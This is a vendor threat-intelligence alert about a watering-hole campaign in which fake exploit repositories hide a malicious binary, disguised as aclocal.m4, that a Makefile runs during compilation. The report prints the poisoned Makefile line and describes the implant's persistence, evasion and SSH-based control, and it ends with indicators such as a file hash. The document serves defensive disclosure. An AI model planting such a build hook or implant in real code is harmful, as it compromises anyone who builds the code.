Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack

Alert: Vulnerability Researchers and Red Team Members Targeted in Watering Hole Attack

julho 5, 2023 | NSFOCUS


NSFOCUS researchers detected a code poisoning attack against vulnerability researchers and red team members recently. Attackers use implanted malicious programs in multiple code repositories under the cover of two highly exploitable vulnerabilities of Linux and VMware exposed this year. Once a user downloads the code and compiles it locally, malicious code contained in the compilation script will be executed to allow hackers to gain host control.

Up to now, two code repositories containing malicious code and the CnC address are still alive, which means that it remains an ongoing attack.

Figure 1 PoC repository 1 with malicious code –  Linux kernel privilege escalation vulnerability

Figure 2 PoC repository 2 with malicious code –  VMware privilege escalation vulnerability

From the submission records, it can be found that the attacker has uploaded relevant malicious codes multiple times from the end of June 2023.

Figure 3 Code Commit Timeline

The attack intention was revealed two days after the malicious code was uploaded, and repo users disputed an allegation in the issue that this PoC is fake and malicious code is implanted.

Figure 4 Comments about fake PoC

Analysis of Techniques and Tactics

Figure 5 Execution flow

Poisoning of disguised compiled configuration files

From the perspective of supply chain security, attackers used code poisoning to carry out attacks in the process of code compilation. Instead of hosting the binary payload in a repository, as is often the case for phishing, implanting malicious code and compiling configuration files are undoubtedly more subtle.

CFLAGS= -I./inc
LDFLAGS= -pthread -static

all: obj $(TARGET) get_root

    $(CC) $(LDFLAGS) -o $@ $^
    strip $@
./src/aclocal.m4 <--Execute malicious programs contained in the repository

The Makefile compilation configuration file contains the commands required to compile and generate binaries, and an attacker inserts the process of executing the file aclocal.m4 in the src directory during the normal compilation flow. This file is actually a default configuration file in GNU automake, which is renamed to deceive the victim. The file aclocal.m4 itself is a malicious program for Linux systems. Once the user executes the make command, the compilation project will be enabled.

aclocal.m4: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/,
BuildID[sha1]=9fc8befaa32a1a88133dd077db0369576313e6d2, for GNU/Linux 3.2.0, stripped

Multistage Malicious Sample kworker with Built-in Defense Evasion Feature

Copy itself to the HOME directory and add persistence at first execution

Figure 6 Copy itself to the HOME directory and add persistence

Defense Evasion: timestamp modification; attacker connection through timestamp forgery

Figure 7 Defense evasion

Pull the content from the hardcoded URL and decrypt it.

Figure 8 Pull the content and decrypt it

During the test, it was found that when a request is made incorrectly, the attacker server returns empty content and blacklists the requested IP address.

Figure 9 Empty content is returned

The real content requested is a bash script [1]. On the one hand, this bash script collects information and uploads it to the public repository, and then sends it back to the repository for linking to the server; on the other hand, it realizes persistence and continuous control through SSH.

Figure 10 Returned content

As of this article, NSFOCUS Threat Intelligence has supported detection and alert on threat intelligence of involved infrastructure. Some NSFOCUS’s products have captured attack events using the malware.

Figure 11 Screenshot from NSFOCUS Threat Intelligence (NTI)


In recent years, similar attacks targeting vulnerability researchers and red team members by using vulnerability exploits as baits are not uncommon. However, compared with the previous method of baiting malicious EXE files, implanting malicious codes in compiled configuration files makes the exploitation chain that triggers malicious behaviors during compilation more covert. However, it requires the victim to have the vulnerability EXP command line compilation ability, which undoubtedly screens out a number of people who are used to executing vulnerability exploitation programs simply downloaded on the Internet, which means that the target has been shifted to vulnerability researchers or red team members capable of weaponizing vulnerabilities.

Based on the existing intelligence and preliminary detection of the attacker’s infrastructure, we believe that this code poisoning attack could be long-simmered and a part of a persistent attack: select a small project with low attention and low stars to test the feasibility, and collect necessary information for later intended activities.

IOC Information

Malicious Github Repo:
Malicious sample kworker SHA256: caa69b10b0bfca561dec90cbd1132b6dcb2c8a44d76a272a0b70b5c64776ff6c
Payload delivery, CnC address: